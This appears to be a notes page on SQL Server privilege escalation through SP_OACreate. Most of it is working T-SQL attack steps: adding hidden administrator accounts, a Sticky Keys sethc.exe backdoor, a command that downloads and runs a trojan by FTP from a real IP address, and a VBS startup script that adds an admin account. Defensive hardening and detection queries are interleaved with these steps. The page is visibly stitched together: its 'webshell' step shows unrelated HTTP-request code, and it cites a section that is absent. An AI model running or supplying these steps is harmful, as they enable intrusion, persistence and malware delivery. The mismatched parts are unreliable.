Notes on privilege escalation with SP_OACreate

When xp_cmdshell has been dropped or fails, SP_OACreate can be used instead for privilege escalation.

First:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;

This turns on the OLE Automation component, which is off by default in SQL Server 2005.
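The same switch is what a defender audits and reverses. The T-SQL below is an added example written for this page, not the post's own code: it reads the current state of the relevant options from sys.configurations, sets them back to the hardened value (0), lists the logins that hold the server roles implicitly carrying ALTER SETTINGS (the permission sp_configure requires) and shows which OS account any OLE object would run as. sys.dm_server_services is available from SQL Server 2008 R2 SP1 onward; the other views are standard catalog views.

```sql
-- 1. Current state. value_in_use = 1 means the option is live right now.
SELECT name, value, value_in_use, is_dynamic
FROM sys.configurations
WHERE name IN (N'Ole Automation Procedures', N'xp_cmdshell', N'show advanced options');

-- 2. Hardened state: OLE Automation and xp_cmdshell both off.
--    Both options are dynamic, so RECONFIGURE applies them without a restart.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;

-- 3. Who can flip it back on: members of sysadmin / serveradmin hold
--    ALTER SETTINGS implicitly. Anything unexpected here is the real finding.
SELECT r.name AS server_role, m.name AS member_login, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN (N'sysadmin', N'serveradmin')
ORDER BY r.name, m.name;

-- 4. The OS identity that wscript.shell / filesystemobject would inherit.
--    A per-service SID or virtual account cannot write into %SystemRoot%\system32,
--    which is what the later steps of the post depend on.
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;
```

Run step 1 and 3 on a schedule and alert on any change; step 2 is idempotent and safe to include in a hardening baseline.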

1) Add a user directly

Windows 2000:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 123 /add'

Windows XP and 2003:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123$ 123 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123$ /add'

2) Sticky Keys replacement

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';

Both components, sp_oacreate and sp_oamethod, must be available.
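Because every step on this page goes through the sp_OA* procedures, they are the natural pivot for a retrospective check. sp_OACreate can be executed by sysadmin members or by any principal granted EXECUTE on it directly in master, so the first query lists explicit grants; the second and third look for calling text still in the plan cache or currently executing. This is an added example for this page, not the post's code. The plan cache is volatile, so an empty result is not evidence that nothing ran; the Extended Events session shown later in the page is the durable option.

```sql
USE master;

-- 1. Explicit EXECUTE grants on the OLE Automation procedures.
--    sysadmin members are allowed implicitly and will not appear here.
SELECT pr.name AS grantee, pr.type_desc, o.name AS procedure_name,
       dp.state_desc, dp.permission_name
FROM sys.database_permissions AS dp
JOIN sys.all_objects          AS o  ON o.object_id = dp.major_id AND dp.class = 1
JOIN sys.database_principals  AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE o.name LIKE N'sp[_]OA%'
ORDER BY pr.name, o.name;

-- 2. Cached batches that referenced the procedures, newest first.
--    Ad hoc batches may age out quickly; treat hits as leads, not an inventory.
SELECT TOP (50)
       qs.last_execution_time,
       qs.execution_count,
       DB_NAME(st.dbid)            AS database_name,
       SUBSTRING(st.text, 1, 400)  AS statement_text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE st.text LIKE N'%sp[_]OA%'
ORDER BY qs.last_execution_time DESC;

-- 3. Requests running at this moment whose text references them,
--    with the login, host and application that submitted them.
SELECT r.session_id, r.start_time, s.login_name, s.host_name, s.program_name,
       SUBSTRING(st.text, 1, 400) AS statement_text
FROM sys.dm_exec_requests AS r
JOIN sys.dm_exec_sessions AS s ON s.session_id = r.session_id
CROSS APPLY sys.dm_exec_sql_text(r.sql_handle) AS st
WHERE st.text LIKE N'%sp[_]OA%';
```

The `[_]` in the LIKE patterns keeps the underscore literal; a bare `_` is a single-character wildcard in T-SQL and would also match names such as `spXOACreate`.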

3) Upload a trojan directly

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c echo open 222.180.210.113> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye>> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q/f&del 1.exe /f /q'--

4) Write an account-adding script as a startup item

declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$","user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';

5) If the server hosts a website, use method 4) to write a one-line webshell directly.

DECLARE @Object int;
DECLARE @HR int;
DECLARE @Property nvarchar(255);
DECLARE @Return nvarchar(255);
DECLARE @Source nvarchar(255), @Desc nvarchar(255);
DECLARE @httpStatus int;
DECLARE @response varchar(8000);

-- Create an instance of the OLE object
EXEC @HR = sp_OACreate N'MSXML2.XMLHTTP.6.0', @Object OUT;
IF @HR <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
    RAISERROR('Error Creating COM Component 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc)
    GOTO END_ROUTINE
END

BEGIN
    -- Open
    EXEC @HR = sp_OAMethod @Object, N'open', Null, 'GET', 'http://localhost:1728/HttpServer/submit.aspx', FALSE;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('Open 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc)
        GOTO CLEANUP
    END

    -- setRequestHeader
    EXEC @HR = sp_OAMethod @Object, N'setRequestHeader', Null, 'Content-Type', 'text/xml';
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('setRequestHeader 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc)
        GOTO CLEANUP
    END

    -- send
    EXEC @HR = sp_OAMethod @Object, N'send', Null, '';
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('send 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc)
        GOTO CLEANUP
    END

    -- readyState
    EXEC @HR = sp_OAGetProperty @Object, 'readyState', @httpStatus OUT;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('readyState 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc)
        GOTO CLEANUP
    END

    -- verify readyState (4 = complete)
    IF @httpStatus <> 4
    BEGIN
        RAISERROR('readyState http status bad', 16, 1)
        GOTO CLEANUP
    END

    -- status
    EXEC @HR = sp_OAGetProperty @Object, 'status', @httpStatus OUT;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('getstatus 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc)
        GOTO CLEANUP
    END

    -- verify HTTP status
    IF @httpStatus <> 200
    BEGIN
        Print Cast(@httpStatus As varchar)
        RAISERROR('Open http status bad', 16, 1)
        GOTO CLEANUP
    END

    -- responseText
    EXEC @HR = sp_OAGetProperty @Object, 'responseText', @response OUT
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        RAISERROR('responseText 0x%x, %s, %s', 16, 1, @HR, @Source, @Desc)
        GOTO CLEANUP
    END
    Print @response
END

CLEANUP:
BEGIN
    EXEC @HR = sp_OADestroy @Object;
    IF @HR <> 0
    BEGIN
        EXEC sp_OAGetErrorInfo @Object, @Source OUT, @Desc OUT;
        SELECT HR = convert(varbinary(4), @HR), Source = @Source, Description = @Desc;
    END
END

END_ROUTINE:
RETURN;
GO